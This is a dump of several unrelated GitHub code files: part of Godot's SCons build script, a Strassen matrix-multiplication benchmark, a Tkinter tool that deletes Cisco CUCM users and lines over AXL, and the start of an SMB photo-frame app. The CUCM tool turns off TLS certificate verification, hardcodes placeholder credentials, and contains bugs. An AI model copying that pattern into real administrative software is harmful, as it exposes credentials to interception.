= suffix + env[\"OBJSUFFIX\"]\n # (SH)LIBSUFFIX will be used for our own built libraries\n # LIBSUFFIXES contains LIBSUFFIX and SHLIBSUFFIX by default,\n # so we need to append the default suffixes to keep the ability\n # to link against thirdparty libraries (.a, .so, .lib, etc.).\n if os.name == \"nt\":\n # On Windows, only static libraries and import libraries can be\n # statically linked - both using .lib extension\n env[\"LIBSUFFIXES\"] += [env[\"LIBSUFFIX\"]]\n else:\n env[\"LIBSUFFIXES\"] += [env[\"LIBSUFFIX\"], env[\"SHLIBSUFFIX\"]]\n env[\"LIBSUFFIX\"] = suffix + env[\"LIBSUFFIX\"]\n env[\"SHLIBSUFFIX\"] = suffix + env[\"SHLIBSUFFIX\"]\n\n if env[\"tools\"]:\n env.Append(CPPDEFINES=[\"TOOLS_ENABLED\"])\n methods.write_disabled_classes(env[\"disable_classes\"].split(\",\"))\n if env[\"disable_3d\"]:\n if env[\"tools\"]:\n print(\n \"Build option 'disable_3d=yes' cannot be used with 'tools=yes' (editor), \"\n \"only with 'tools=no' (export template).\"\n )\n Exit(255)\n else:\n env.Append(CPPDEFINES=[\"_3D_DISABLED\"])\n if env[\"disable_advanced_gui\"]:\n if env[\"tools\"]:\n print(\n \"Build option 'disable_advanced_gui=yes' cannot be used with 'tools=yes' (editor), \"\n \"only with 'tools=no' (export template).\"\n )\n Exit(255)\n else:\n env.Append(CPPDEFINES=[\"ADVANCED_GUI_DISABLED\"])\n if env[\"minizip\"]:\n env.Append(CPPDEFINES=[\"MINIZIP_ENABLED\"])\n\n editor_module_list = [\"freetype\"]\n if env[\"tools\"] and not env.module_check_dependencies(\"tools\", editor_module_list):\n print(\n \"Build option 'module_\"\n + x\n + \"_enabled=no' cannot be used with 'tools=yes' (editor), only with 'tools=no' (export template).\"\n )\n Exit(255)\n\n if not env[\"verbose\"]:\n methods.no_verbose(sys, env)\n\n GLSL_BUILDERS = {\n \"RD_GLSL\": env.Builder(\n action=env.Run(glsl_builders.build_rd_headers, 'Building RD_GLSL header: \"$TARGET\"'),\n suffix=\"glsl.gen.h\",\n src_suffix=\".glsl\",\n ),\n \"GLSL_HEADER\": env.Builder(\n action=env.Run(glsl_builders.build_raw_headers, 'Building GLSL header: \"$TARGET\"'),\n suffix=\"glsl.gen.h\",\n src_suffix=\".glsl\",\n 
),\n }\n env.Append(BUILDERS=GLSL_BUILDERS)\n\n if not env[\"platform\"] == \"server\":\n env.Append(\n BUILDERS={\n \"GLES3_GLSL\": env.Builder(\n action=run_in_subprocess(gles3_builders.build_gles3_headers),\n suffix=\"glsl.gen.h\",\n src_suffix=\".glsl\",\n )\n }\n )\n\n scons_cache_path = os.environ.get(\"SCONS_CACHE\")\n if scons_cache_path != None:\n CacheDir(scons_cache_path)\n print(\"Scons cache enabled... (path: '\" + scons_cache_path + \"')\")\n\n if env[\"vsproj\"]:\n env.vs_incs = []\n env.vs_srcs = []\n\n Export(\"env\")\n\n # Build subdirs, the build order is dependent on link order.\n SConscript(\"core/SCsub\")\n SConscript(\"servers/SCsub\")\n SConscript(\"scene/SCsub\")\n SConscript(\"editor/SCsub\")\n SConscript(\"drivers/SCsub\")\n\n SConscript(\"platform/SCsub\")\n SConscript(\"modules/SCsub\")\n if env[\"tests\"]:\n SConscript(\"tests/SCsub\")\n SConscript(\"main/SCsub\")\n\n SConscript(\"platform/\" + selected_platform + \"/SCsub\") # Build selected platform.\n\n # Microsoft Visual Studio Project Generation\n if env[\"vsproj\"]:\n env[\"CPPPATH\"] = [Dir(path) for path in env[\"CPPPATH\"]]\n methods.generate_vs_project(env, GetOption(\"num_jobs\"))\n methods.generate_cpp_hint_file(\"cpp.hint\")\n\n # Check for the existence of headers\n conf = Configure(env)\n if \"check_c_headers\" in env:\n for header in env[\"check_c_headers\"]:\n if conf.CheckCHeader(header[0]):\n env.AppendUnique(CPPDEFINES=[header[1]])\n\nelif selected_platform != \"\":\n if selected_platform == \"list\":\n print(\"The following platforms are available:\\n\")\n else:\n print('Invalid target platform \"' + selected_platform + '\".')\n print(\"The following platforms were detected:\\n\")\n\n for x in platform_list:\n print(\"\\t\" + x)\n\n print(\"\\nPlease run SCons again and select a valid platform: platform=\")\n\n if selected_platform == \"list\":\n # Exit early to suppress the rest of the built-in SCons messages\n Exit()\n else:\n Exit(255)\n\n# The following only makes sense when the 'env' is defined, and assumes it is.\nif \"env\" in locals():\n methods.show_progress(env)\n # TODO: replace this with `env.Dump(format=\"json\")`\n # once we start requiring SCons 4.0 as min version.\n methods.dump(env)\n\n\ndef print_elapsed_time():\n elapsed_time_sec = round(time.time() - time_at_start, 3)\n time_ms = round((elapsed_time_sec % 1) * 1000)\n print(\"[Time elapsed: {}.{:03}]\".format(time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time_sec)), time_ms))\n\n\natexit.register(print_elapsed_time)\n","repo_name":"MrJustreborn/godot4_webcam","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":32727,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"23099715030","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 20 17:29:30 2019\r\n\r\n@author: bjwil\r\n\"\"\"\r\nimport numpy as np\r\n\r\n#a = np.matrix('1 2 3 4; 4 4 4 4; 4 3 2 1; 1 2 3 4')\r\n#b = np.matrix('1 1 1 1; 2 2 2 2; 3 3 3 3; 4 4 4 4')\r\nrows = cols = 2\r\na = np.matrix(np.random.randint(0,10, size=(rows, cols)))\r\nb = np.matrix(np.random.randint(0,10, size=(rows, cols)))\r\n#n = 2\r\n#k = 4\r\n#np.matmul(a[0:n,0:n], b[0:n, n:k])\r\ndef smm(a, b):\r\n n = len(a)\r\n c = np.zeros(shape=(len(a), len(a)))\r\n for i in range(0, n):\r\n for j in range(0, n):\r\n for k in range(0,n):\r\n c[i,j] = c[i,j] + (a[i,k] * b[k,j])\r\n \r\n return c\r\n\r\n\r\ndef smmr(a, b):\r\n n = len(a)\r\n c = np.zeros(shape=(len(a), len(a)))\r\n if n == 1:\r\n 
c[0,0] = a[0,0] * b[0,0]\r\n else:\r\n n = int(n/2)\r\n k = int(len(c))\r\n c[0:n, 0:n] = smmr(a[0:n,0:n], b[0:n,0:n]) + smmr(a[0:n, n:k], b[n:k,0:n])\r\n \r\n c[0:n, n:k] = smmr(a[0:n,0:n], b[0:n, n:k]) + smmr(a[0:n, n:k], b[n:k, n:k])\r\n \r\n c[n:k, 0:n] = smmr(a[n:k,0:n], b[0:n,0:n]) + smmr(a[n:k, n:k], b[n:k,0:n])\r\n \r\n c[n:k, n:k] = smmr(a[n:k,0:n], b[0:n, n:k]) + smmr(a[n:k, n:k], b[n:k, n:k])\r\n \r\n return c\r\n\r\nclass Strassen():\r\n \r\n def __init__(self):\r\n self.multiplications = 0\r\n \r\n def strassen_smmr(self, a, b):\r\n n = len(a)\r\n c = np.zeros(shape=(len(a), len(a)))\r\n if n == 1:\r\n c[0,0] = a[0,0] * b[0,0]\r\n self.multiplications += 1\r\n else:\r\n n = int(n/2)\r\n k = int(len(c))\r\n a11 = a[0:n,0:n]\r\n a12 = a[0:n, n:k]\r\n a21 = a[n:k,0:n]\r\n a22 = a[n:k,n:k]\r\n b11 = b[0:n,0:n]\r\n b12 = b[0:n, n:k]\r\n b21 = b[n:k,0:n]\r\n b22 = b[n:k,n:k]\r\n \r\n \r\n s1 = b12 - b22\r\n s2 = a11 + a12\r\n s3 = a21 + a22\r\n s4 = b21 - b11\r\n s5 = a11 + a22\r\n s6 = b11 + b22\r\n s7 = a12 - a22\r\n s8 = b21 + b22\r\n s9 = a11 - a21\r\n s10 = b11 + b12\r\n \r\n p1 = self.strassen_smmr(a11, s1)\r\n p2 = self.strassen_smmr(s2, b22)\r\n p3 = self.strassen_smmr(s3, b11)\r\n p4 = self.strassen_smmr(a22, s4)\r\n p5 = self.strassen_smmr(s5, s6)\r\n p6 = self.strassen_smmr(s7, s8)\r\n p7 = self.strassen_smmr(s9, s10)\r\n \r\n c[0:n,0:n] = p5 + p4 - p2 + p6\r\n c[0:n, n:k] = p1 + p2\r\n c[n:k,0:n] = p3 + p4\r\n c[n:k,n:k] = p5 + p1 - p3 - p7\r\n \r\n return c\r\n\r\n\r\n\r\nimport timeit, functools\r\n\r\nsm = 7\r\ntimes = 100\r\n\r\nindex = [i for i in range(0, sm)]\r\narray_1 = []\r\narray_2 = []\r\narray_3 = []\r\n#i = 2\r\nfor i in range(0, sm):\r\n a = np.floor(np.random.rand(2**i,2**i)*10)\r\n b = np.floor(np.random.rand(2**i,2**i)*10)\r\n \r\n sm1 = timeit.Timer(functools.partial(smm, a, b)) \r\n array_1.append(sm1.timeit(times)) \r\n \r\n sm2 = timeit.Timer(functools.partial(smmr, a, b)) \r\n array_2.append(sm2.timeit(times))\r\n \r\n test = Strassen()\r\n sm3 = timeit.Timer(functools.partial(test.strassen_smmr, a, b)) \r\n array_3.append(sm3.timeit(times)) \r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndf = pd.DataFrame({'matrix_order': [2**i for i in index], \r\n 'smmNonRecursive' : array_1,\r\n 'smmRecursive': array_2, \r\n 'strassen' : array_3,\r\n })\r\n# gca stands for 'get current axis'\r\nax = plt.gca()\r\ndf.plot(kind='line',x='matrix_order',y='smmNonRecursive', color='green', ax=ax)\r\ndf.plot(kind='line',x='matrix_order',y='smmRecursive',ax=ax)\r\ndf.plot(kind='line',x='matrix_order',y='strassen', color='red', ax=ax)\r\nplt.ylabel(\"seconds\")\r\nplt.title(\"Comparison for Matrix Methods: {} runs\".format(times))\r\nplt.show()\r\n","repo_name":"BJWiley233/Practical-Computer-Concepts-Files","sub_path":"Python/SquareMatrixMultiplyRecursive.py","file_name":"SquareMatrixMultiplyRecursive.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10816838838","text":"from tkinter import *\nfrom tkinter import messagebox\nimport ssl\nimport urllib\nimport requests\nimport suds\nimport urllib3\nfrom suds.client import Client\nimport xml.etree.cElementTree as ET\nfrom tkinter import ttk\nimport pyperclip\nimport pyautogui as pya\nimport time\n\nroot = Tk()\nroot.title(\"CUCM Functions\")\nroot.resizable(0, 0)\n\nstyle = ttk.Style()\nstyle.configure(\"BW.TLabel\", foreground=\"black\", background=\"white\")\n\nstyle.map(\"C.TButton\",\n 
foreground=[('pressed', 'red'), ('active', 'blue')],\n background=[('pressed', '!disabled', 'black'), ('active', 'white')]\n )\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\nusername = 'username'\npassword = 'password'\ncucm = 'http://0.0.0.0//axl/'\nwsdl = 'file:///D:/axlsqltoolkit/schema/11.5/AXLAPI.wsdl'\n\n\n# vraca sve brojeve koji se ne koriste u DirectoryNumber-u\ndef difference_list(extension_range, clean_list_numbers):\n return [item for item in extension_range if item not in clean_list_numbers]\n\n\n# vraca sve brojeve koji nisu upisani u listu shared_line_extenstion\ndef shared_line(free_agent_extensions, shared_line_exstension):\n return [item for item in free_agent_extensions if item not in shared_line_exstension]\n\n\n# vraca sve brojeve koji nisu upisani u listu reserved_line\ndef reserved_line(shared_line_extensions, reserved_line_extensions):\n return [item for item in shared_line_extensions if item not in reserved_line_extensions]\n\n\n# CCM\n\n\ndef get_ccm_version(client):\n return client.service.getCCMVersion\n\n\n# DIRECTORY NUMBER\n\n\ndef get_directory_number_by_number(client, pattern, routePartitionName):\n return client.service.getLine(pattern=pattern, routePartitionName=routePartitionName)\n\n\ndef get_directory_number_by_description(client, description, routePartitionName):\n return client.service.GetLineReq(description=description, routePartitionName=routePartitionName)\n\n\ndef remove_directory_number_by_number(client, pattern, routePartitionName):\n return client.service.removeLine(pattern=pattern, routePartitionName=routePartitionName)\n\n\ndef list_directory_number(client, pattern):\n return client.service.listLine(pattern=pattern)\n\n\n# END USER PROFILE\n\n\ndef get_end_user_by_name(client, name):\n return client.service.getUser(userid=name)\n\n\ndef remove_end_user_by_userid(client, name):\n return client.service.removeUser(userid=name)\n\n\n# DEVICE PROFILE\n\n\ndef get_device_by_name(client, name):\n return client.service.getDeviceProfile(name=name)\n\n\ndef remove_device_by_name(client, name):\n return client.service.removeDeviceProfile(name=name)\n\n\ndef list_listDeviceProfile(client, name):\n return client.service.listDeviceProfile(name=name)\n\n\n# PHONE PROFILE\n\n\ndef get_phone_by_name(client, name):\n return client.service.getPhone(name=name)\n\n\ndef remove_phone_by_name(client, name):\n return client.service.removePhone(name=name)\n\n\ndef update_phone_by_name(client, name, description):\n return client.service.updatePhone(**{'name': name, 'description': description})\n\n\ndef list_phones(client):\n return client.service.listPhone\n\n\ndef ask_user():\n user_input = str(input(\"Opcije: \\n 1. Get device name \\n 2. 
Get phone \\n\"))\n return user_input\n\n\ndef directory_number_pull_ph():\n login_url = 'https://0.0.0.0/axl/'\n cucm_version_actions = 'CUCM:DB ver=11.5 listLine'\n username = 'username'\n password = r'password'\n soap_data = '' \\\n '%%' \\\n ' '\n soap_headers = {'Content-type': 'text/xml', 'SOAPAction': cucm_version_actions}\n\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += 'HIGH:!DH:!aNULL'\n\n try:\n requests.packages.urllib3.contrib.pyopenssl.DEFAULT_SSL_CIPHERS_LIST += 'HIGH:!DH:!aNULL'\n except AttributeError:\n # nije pyopenssl support koristena / potrebna / moguca\n pass\n\n try:\n axl_request = requests.post(login_url, data=soap_data, headers=soap_headers, verify=False,\n auth=(username, password))\n except ConnectionError:\n print(\"Za prikaz slobodnih ekstenzija potreban je VPN\")\n plain_txt = axl_request.text\n root = ET.fromstring(plain_txt)\n\n list_numbers = []\n extension_range_zagreb = list(range(8500, 8599)) + list(range(8700, 8800)) + [4111, 4801, 4804]\n shared_line_exstension_zagreb = []\n reserved_line_exstenion_zagreb = [8570, 8579, 8581, 8583, 8590, 8595, 8598, 8700, 8740, 8750, 8760, 8770, 8780,\n 8790]\n\n extension_range_split = list(range(8600, 8700))\n shared_line_exstension_split = [8603, 8607, 8615]\n\n for device in root.iter('line'):\n list_numbers.append(device.find('pattern').text)\n # Za prikaz kome broj pripada\n # list_description.append(device.find('description').text)\n\n list_without_quotes = []\n\n for line in list_numbers:\n line = line.replace(\"'\", \"\").replace(\"*\", \"\")\n list_without_quotes.append(line)\n\n clean_list_numbers = [int(i) for i in list_without_quotes]\n\n # nema rezerviranih brojeva u splitu\n free_agent_extensions_split = difference_list(extension_range_split, clean_list_numbers)\n shared_line_numbers_split = shared_line(free_agent_extensions_split, shared_line_exstension_split)\n\n free_agent_extensions_zagreb = difference_list(extension_range_zagreb, clean_list_numbers)\n shared_line_numbers_zagreb = shared_line(free_agent_extensions_zagreb, shared_line_exstension_zagreb)\n reserver_line_numbers_zagreb = reserved_line(shared_line_numbers_zagreb, reserved_line_exstenion_zagreb)\n\n return reserver_line_numbers_zagreb + ' Split: ' + shared_line_exstension_split\n\n\ndef directory_number_pull_isk():\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n login_url = 'https://0.0.0.0/axl/'\n cucm_version_actions = 'CUCM:DB ver=11.5 listLine'\n username = 'username'\n password = r'password'\n soap_data = '' \\\n '%%' \\\n ' '\n soap_headers = {'Content-type': 'text/xml', 'SOAPAction': cucm_version_actions}\n\n axl_request = requests.post(login_url, data=soap_data, headers=soap_headers, verify=False,\n auth=(username, password))\n plain_txt = axl_request.text\n root = ET.fromstring(plain_txt)\n\n list_numbers = []\n extension_range = list(range(100, 599)) + [701, 802, 839, 847, 857, 876, 877, 878, 881, 927, 967]\n shared_line_exstension = [130, 170]\n reserved_line_exstenion = [108, 150, 205, 259, 300, 320, 330, 334, 394, 398, 399, 480, 481, 482, 483, 484, 485,\n 486, 487, 488, 489, 570, 571, 573, 574, 575, 577, 578, 579, 580, 590, 702]\n\n for device in root.iter('line'):\n list_numbers.append(device.find('pattern').text)\n # Za prikaz kome broj pripada\n # list_description.append(device.find('description').text)\n\n list_without_quotes = []\n\n for line in list_numbers:\n line = line.replace(\"'\", \"\").replace(\"*\", 
\"\")\n list_without_quotes.append(line)\n\n clean_list_numbers = [int(i) for i in list_without_quotes]\n\n free_agent_extensions = difference_list(extension_range, clean_list_numbers)\n shared_line_numbers = shared_line(free_agent_extensions, shared_line_exstension)\n reserver_line_numbers = reserved_line(shared_line_numbers, reserved_line_exstenion)\n\n return reserver_line_numbers\n\n\ndef deactivation_agent_isk_GUI_2(first_last_name, username):\n while True:\n try:\n route_partition_name_isk= 'PT_isk_Internal'\n device_profile_isk = ' Device Profile 6941'\n cucm_server = Client(wsdl, location=cucm, username=username, password=password)\n device_profile = get_device_by_name(cucm_server, first_last_name + device_profile_isk)\n if device_profile is None:\n print(\"Ne postoji korisnik pod imenom \" + first_last_name)\n device_number = (int(device_profile['return']['deviceProfile']['lines']['line'][0]['dirn']['pattern']))\n if device_number is None:\n print(\"Ne postoji broj od \" + first_last_name)\n remove_device_by_name(cucm_server, first_last_name + device_profile_isk)\n remove_end_user_by_userid(cucm_server, username)\n remove_directory_number_by_number(cucm_server, device_number, route_partition_name_isk)\n except suds.transport.TransportError:\n print(\"Korisnik \" + first_last_name + \" nije pronaden\")\n except urllib.error.HTTPError:\n print(\"HTTP error\")\n except suds.WebFault:\n print(\"Korinsik \" + first_last_name + \" ne postoji\")\n\n\ndef deactivation_agent_ph_GUI(first_last_name, username):\n # while True:\n # try:\n route_partition_name_ph = 'PT_Internal'\n device_profile_ph = ' Device Profile'\n cucm_server = Client(wsdl, location=cucm, username=username, password=password)\n device_profile = get_device_by_name(cucm_server, first_last_name + device_profile_ph)\n if device_profile is None:\n messagebox.showwarning(\"Obavijest\", \"Ne postoji korisnik pod imenom\" + first_last_name)\n # break\n device_number = (int(device_profile['return']['deviceProfile']['lines']['line'][0]['dirn']['pattern']))\n if device_number is None:\n messagebox.showwarning(\"Obavijest\", \"Ne postoji broj od \" + first_last_name)\n # break\n remove_device_by_name(cucm_server, first_last_name + device_profile_ph)\n remove_end_user_by_userid(cucm_server, username)\n remove_directory_number_by_number(cucm_server, device_number, route_partition_name_ph)\n\n\n# except suds.transport.TransportError:\n# messagebox.showwarning(\"Obavijest\", \"Korisnik \" + str(first_last_name) + \" nije pronaden\")\n# break\n# except urllib.error.HTTPError:\n# messagebox.showwarning(\"Obavijest\", \"HTTP error\")\n# break\n# except suds.WebFault:\n# messagebox.showwarning(\"Obavijest\", \"Korisnik \" + str(first_last_name) + \" ne postoji\")\n# break\n\n\ndef deactivation_agent_isk_GUI(first_last_name, username):\n # while True:\n # try:\n route_partition_name_isk = 'PT_Isk_Internal'\n device_profile_isk = ' Device Profile 6941'\n cucm_server = Client(wsdl, location=cucm, username=username,\n password=password)\n device_profile = get_device_by_name(cucm_server, first_last_name + device_profile_isk)\n if device_profile is None:\n messagebox.showwarning(\"Obavijest\", \"Ne postoji korisnik pod imenom \" + first_last_name)\n # break\n device_number = (int(device_profile['return']['deviceProfile']['lines']['line'][0]['dirn']['pattern']))\n if device_number is None:\n messagebox.showwarning(\"Obavijest\", \"Ne postoji broj od \" + first_last_name)\n # break\n remove_device_by_name(cucm_server, first_last_name + 
device_profile_isk)\n remove_end_user_by_userid(cucm_server, username)\n remove_directory_number_by_number(cucm_server, device_number, route_partition_name_isk)\n\n\n# except suds.transport.TransportError:\n# messagebox.showwarning(\"Obavijest\", \"Korisnik \" + str(first_last_name) + \" nije pronaden\")\n# break\n# except urllib.error.HTTPError:\n# messagebox.showwarning(\"Obavijest\", \"HTTP error\")\n# break\n# except suds.WebFault:\n# messagebox.showwarning(\"Obavijest\", \"Korinsik \" + str(first_last_name) + \" ne postoji\")\n# break\n\n\ndef deactivation_agent_ph_old():\n while True:\n try:\n route_partition_name_ph = 'PT_Internal'\n device_profile_ph = ' Device Profile'\n cucm_server = Client(wsdl, location=cucm, username=username, password=password)\n user_first_last_name = str(input(\"Unesi ime i prezime agenta: \"))\n user_username = str(input(\"Unesi korisničko ime agenta (username): \"))\n\n device = get_device_by_name(cucm_server, user_first_last_name + device_profile_ph)\n device_number = (int(device['return']['deviceProfile']['lines']['line'][0]['dirn']['pattern']))\n if device_number is None:\n print(\"Ne postoji broj kod traženog agenta!\")\n remove_device_by_name(cucm_server, user_first_last_name + device_profile_ph)\n remove_end_user_by_userid(cucm_server, user_username)\n remove_directory_number_by_number(cucm_server, device_number, route_partition_name_ph)\n print(\"Uspješno odjavljen agent \" + user_first_last_name)\n except suds.transport.TransportError:\n print(\"Agent \" + user_first_last_name + \" nije pronađen\")\n except urllib.error.HTTPError:\n print(\"HTTP error\")\n except suds.WebFault:\n print(\"Agent \" + user_first_last_name + \" ne postoji\")\n\n\ndef show_isk_extensions():\n list1.delete(0.0, END)\n try:\n d = directory_number_pull_isk()\n except ConnectionError:\n messagebox.showwarning(\"Obavijest\", \"Problem kod konekcije, provjeri VPN\")\n list1.insert(END, d)\n\n\ndef show_ph_extensions():\n list1.delete(0.0, END)\n try:\n t = directory_number_pull_ph()\n except ConnectionError:\n messagebox.showwarning(\"Obavijest\", \"Problem kod konekcije, provjeri VPN\")\n list1.insert(END, t)\n\n\ndef deactivation_agent_isk():\n if len(first_last_name_text.get()) >= 5 and len(username_text.get()) >= 3:\n first_last_entry = str(first_last_name_text.get())\n username_entry = str(username_text.get())\n deactivation_agent_isk_GUI(first_last_entry, username_entry)\n messagebox.showwarning(\"Obavijest\", \"Uspješno odjavljen korisnik \" + first_last_entry)\n e1.delete(0, END)\n e2.delete(0, END)\n else:\n messagebox.showwarning(\"Obavijest\", \"Naziv agenta ili Username nije upisan!\")\n\n\ndef deactivation_agent_ph():\n if len(first_last_name_text.get()) >= 5 and len(username_text.get()) >= 3:\n first_last_entry = str(first_last_name_text.get())\n username_entry = str(username_text.get())\n deactivation_agent_ph_GUI(first_last_entry, username_entry)\n messagebox.showinfo(\"Obavijest\", \"Uspješno odjavljen korisnik \" + first_last_entry)\n e1.delete(0, END)\n e2.delete(0, END)\n else:\n messagebox.showwarning(\"Obavijest\", \"Naziv agenta ili Username nije upisan!\")\n\n\n# radi!\ndef radi_li_textbox():\n entry_test = first_last_name_text.get()\n print(entry_test)\n e1.delete(0, END)\n\n\ndef leftClick(event):\n print(\"Left\")\n\n\ndef middleClick(event):\n print(\"Middle\")\n\n\n#def copy_text_to_clipboard(event):\n # field_value = event.widget.get(\"1.0\", 'end-1c') # get field value from event, but remove line return at end\n # root.clipboard_clear() # clear 
clipboard contents\n # root.clipboard_append(field_value) # append new value to clipbaord\n\n\ndef rightClick(event):\n print(\"Right\")\n\n\ndef popup(event):\n try:\n popup_menu.tk_popup(event.x_root, event.y_root, 0)\n finally:\n popup_menu.grab_release()\n\n\ndef copy_clipboard():\n pya.hotkey('ctrl', 'c')\n time.sleep(.01) # ctrl-c is usually very fast but your program may execute faster\n return pyperclip.paste()\n\n\npya.doubleClick(pya.position())\n\n\ndef copy_highlighted():\n list = []\n var = copy_clipboard()\n list.append(var)\n return list\n\n\npopup_menu = Menu(tearoff=0)\npopup_menu.add_command(label=\"Copy\", command=copy_highlighted)\n\n# root.bind(\"\", leftClick)\n# root.bind(\"\", middleClick)\nroot.bind(\"\", popup)\nroot.grid()\n\nlbl1 = ttk.Label(root, text=\"Ime i prezime:\")\nlbl1.grid(row=0, sticky=W)\n\nlbl2 = ttk.Label(root, text=\"Korisničko ime:\")\nlbl2.grid(row=1, sticky=W)\n\nfirst_last_name_text = StringVar()\ne1 = Entry(root, textvariable=first_last_name_text)\ne1.grid(row=0, column=1, ipadx=37, sticky=W)\ne1.focus()\n\nusername_text = StringVar()\ne2 = Entry(root, textvariable=username_text)\ne2.grid(row=1, column=1, ipadx=37, sticky=W)\n\nlist1 = Text(root, height=6, width=35)\nlist1.grid(row=2, column=0, rowspan=8, columnspan=2)\n\nsb1 = Scrollbar(root)\nsb1.grid(row=2, column=2, rowspan=6)\n\nlist1.configure(yscrollcommand=sb1.set)\nsb1.configure(command=list1.yview)\n\nb1 = ttk.Button(root, text=\"Odjaviti isk agenta\", width=25, style=\"C.TButton\", command=deactivation_agent_isk)\nb1.grid(row=2, column=3)\n\nb2 = ttk.Button(root, text=\"Odjaviti ph agenta\", width=25, style=\"C.TButton\", command=deactivation_agent_ph)\nb2.grid(row=3, column=3)\n\nb3 = ttk.Button(root, text=\"Slobodne ekstenzije isk\", width=25, style=\"C.TButton\", command=show_isk_extensions)\nb3.grid(row=4, column=3)\n\nb4 = ttk.Button(root, text=\"Slobodne ekstenzije ph\", width=25, style=\"C.TButton\", command=show_ph_extensions)\nb4.grid(row=5, column=3)\n\nb5 = ttk.Button(root, text=\"Zatvoriti\", width=25, style=\"C.TButton\", command=root.destroy)\nb5.grid(row=6, column=3)\n\nroot.mainloop()\n","repo_name":"hi-im-phillip/CUCM-desktop-app","sub_path":"DeaktivacijaOdjavaGUI.py","file_name":"DeaktivacijaOdjavaGUI.py","file_ext":"py","file_size_in_byte":17523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32975832198","text":"from __future__ import print_function\n\nfrom contextlib import contextmanager\nimport config\nimport locale\nimport threading\nimport time\n\n#for Python 3\nfrom tkinter import *\nfrom smb.SMBConnection import SMBConnection\n\n#for Python 2.7\n#from Tkinter import *\n#from smb import *\n#from SMBConnection import *\n\n#for photos\nfrom PIL import Image, ImageTk\nfrom PIL.ExifTags import TAGS\nimport random\nimport tempfile\nimport io\n\n#for news\nimport feedparser\n\n#for calendar\nimport os\nimport datetime\nfrom googleapiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\n\n#so we can break from a deep loop\nclass ContinueI(Exception):\n pass\n \ncontinue_i = ContinueI()\n\n\n#--------functions\ndef GetDirs(conn, share, directory):\n print(directory)\n sharedfiles = conn.listPath(share_name, directory)\n dirs = []\n skipdirs = config.skip_directories\n for sharedfile in sharedfiles:\n try:\n #skip \n for skipdir in skipdirs:\n if sharedfile.filename == skipdir:\n raise continue_i\n except ContinueI:\n continue\n \n if 
sharedfile.isDirectory:\n newdir = directory + '/' + sharedfile.filename\n dirs.append(newdir)\n if config.recursive_dirs:\n dirs = dirs + GetDirs(conn, share, newdir)\n return dirs\n\n@contextmanager \ndef setlocale(name): #thread proof function to work with locale\n with LOCALE_LOCK:\n saved = locale.setlocale(locale.LC_ALL)\n try:\n yield locale.setlocale(locale.LC_ALL, name)\n finally:\n locale.setlocale(locale.LC_ALL, saved)\n\ndef getEXIF(img):\n ret = {}\n info = img._getexif()\n if info is not None:\n for tag, value in info.items():\n decoded = TAGS.get(tag, tag)\n ret[str(decoded).lower()] = value\n return ret \n\ndef printEXIF(img):\n tags = getEXIF(img)\n try:\n for tag, value in tags.items():\n print(\"{\" + str(tag) + \"}[\" + str(value) + \"]\\n\")\n except:\n print(\"can't get EXIF information\\n\") \n \n#calendar funtions\ndef suffix(d):\n return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')\n\ndef custom_strftime(format, t):\n return t.strftime(format).replace('{S}', str(t.day) + suffix(t.day))\n \n\n#--------main\nLOCALE_LOCK = threading.Lock()\n\n#set up constants\nscreen_base_width = config.screen_width\nscreen_base_height = config.screen_height\nscreen_multiplier = 1 #/1.875\nscreen_width = screen_base_width * screen_multiplier\nscreen_height = screen_base_height * screen_multiplier\nscreen_tuple = (screen_width,screen_height)\nscreen_ratio = screen_width/screen_height\nmillis_between_calendar_checks = 1000 * 60 *30\n\nui_locale = '' # e.g. 'fr_FR' fro French, '' as default\ntime_format = 12 # 12 or 24\ndate_format = \"%b %d, %Y\" # check python doc for strftime() for options\nnews_country_code = 'us'\nweather_api_token = '' # create account at https://darksky.net/dev/\nweather_lang = 'en' # see https://darksky.net/dev/docs/forecast for full list of language parameters values\nweather_unit = 'us' # see https://darksky.net/dev/docs/forecast for full list of unit parameters values\nlatitude = None # Set this if IP location lookup does not work for you (must be a string)\nlongitude = None # Set this if IP location lookup does not work for you (must be a string)\nxlarge_text_size = 48\nlarge_text_size = 24\nmedium_text_size = 16\nsmall_text_size = 8\n\n\n#for calendar\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/calendar-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/calendar.readonly'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Google Calendar API Python Quickstart'\nphotoIsPortrait = True\n\n\nclass Photo(Frame):\n def __init__(self, parent, *args, **kwargs):\n self.parent=parent\n Frame.__init__(self, parent, bg='black')\n imageTemp=None\n self.panel1 = Label(self, image=imageTemp)\n self.panel1.pack(side='top', fill='both', expand='yes')\n self.flip()\n \n def flip(self):\n #find a photo to display\n photo_path = ''\n while photo_path == '':\n #get a random directory\n randomDir = random.choice(dirs)\n #get list of jpgs\n print(\"rd\" + randomDir)\n try:\n sharedphotos = conn.listPath(share_name, randomDir,pattern=\"*.jpg\")\n if sharedphotos == None:\n continue\n except:\n continue\n #pick one at random\n photo = random.choice(sharedphotos)\n photo_path = randomDir + '/' + photo.filename\n\n #read a photo to memory\n fp = io.BytesIO()\n file_attrs, retrlen = conn.retrieveFile(share_name,photo_path,fp)\n fp.seek(0)\n\n #resize the photo and setup for display\n try:\n imageRaw = Image.open(fp)\n except:\n print(\"Could not open:\" + photo_path)\n fp.close()\n 
